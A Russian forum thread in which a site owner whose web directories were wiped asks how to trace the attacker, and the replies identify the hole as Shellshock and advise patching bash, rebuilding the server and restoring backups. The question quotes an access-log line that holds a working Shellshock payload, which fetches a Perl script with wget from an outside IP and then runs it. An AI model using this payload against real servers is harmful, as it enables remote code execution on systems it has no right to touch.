Задать вопрос
Alexnn
@Alexnn
информационная-безопасность

Как найти и наказать хакера?

Один из моих сайтов пропал. Точнее - директории httpdocs и httpsdocs оказались пустыми

Логи доступа показали, то сайт стал генерировать 404 ошибку после вот такого запроса:

89.248.172.175 - - [28/Nov/2014:19:29:57 +0100] "GET /phppath/cgi_wrapper HTTP/1.1" 200 174 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /tmp;wget -q 82.165.135.9/android.txt;perl android.txt;rm -rf android*\");'"

89.248.172.175 -провайдер найден, письмо на abuse ящик послано.

Файл 82.165.135.9/android.txt - сохранен

82.165.135.9 - провайдер уведомлен

Что можно еще сделать?
  • Вопрос задан
  • 3178 просмотров
Комментировать
Подписаться 3 Оценить Комментировать
Пригласить эксперта
Ответы на вопрос 5
mva
@mva
CEO, CTO, Lua/Gentoo/IPv6 Pioneer
я бы ещё посоветовал:
1) не называть взломщиков (и тем более скрипткидис) хакерами без разбора
2) понять, что вина лежит на вас, а не на нём
3) понять зачем он это сделал: чтобы показать вам уязвимость, на которую вы предпочли забить
Ответ написан
4 комментария
4 комментария
@inkvizitor68sl
Linux-сисадмин с 8 летним стажем.
shellshock.
bash обновлять нужно, батенька.
А на ip-шнике, скорее всего, живет домашний пользователь с вирусней, который и слов таких не слышал никогда.
Ответ написан
Комментировать
Комментировать
gbg
@gbg
Любые ответы на любые вопросы
  1. Сделать снимок диска
  2. Отформатировать все разделы
  3. Установить ОС заново
  4. Восстановить сайт из резервной копии
  5. Устранить дыру
  6. Вернуться к работе
Ответ написан
Комментировать
Комментировать
RicoX
@RicoX
Ушел на http://ru.stackoverflow.com/
1) Полное форматирование сервера с переустановкой всего с нуля.
2) Уволить/оштрафовать своего криворукого админа, который забил на старую уязвимость и обновления сервера.
3) Получить урок по поводу банальной безопасности сервера и нанять компетентного специалиста для его обслуживания.
Найти - никак, скорее всего все действия выполнялись через сайт такого-же ленивого криворучки, который взломали до вашего, так как IP принадлежит нидерландскому хостингу а не интернет провайдеру. Также похоже, что уязвимость эксплуатированна примитивным ботом, а не человеком, но для того чтоб точно это утверждать нужно больше данных.
Ответ написан
Комментировать
Комментировать
opium
@opium
Просто люблю качественно работать
В полицию, если человек не сильно шифровался то найти и наказать, а если есть немного мозгов то все айпи анонимные и концов не найдешь
Ответ написан
Комментировать
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы
Вакансии с Хабр Карьеры
Специалист по управлению уязвимостями (информационная безопасность)
Гринатом Москва
от 100 000 до 120 000 ₽
Специалист по информационной безопасности
Данафлекс Казань
от 90 000 ₽
Руководитель направления информационной безопасности ОКИИ
Интер РАО – Управление сервисами Санкт-Петербург
от 180 000 ₽
Ещё вакансии
Заказы с Хабр Фриланса
Разработать электронику для весов с Wi-Fi
26 апр. 2024, в 01:22
1000 руб./в час
Очень срочно нужно помочь запустить программу с UI
26 апр. 2024, в 00:13
1000 руб./за проект
Создание бота/скрипта для сайта забронирование мест
26 апр. 2024, в 00:10
30000 руб./за проект
Ещё заказы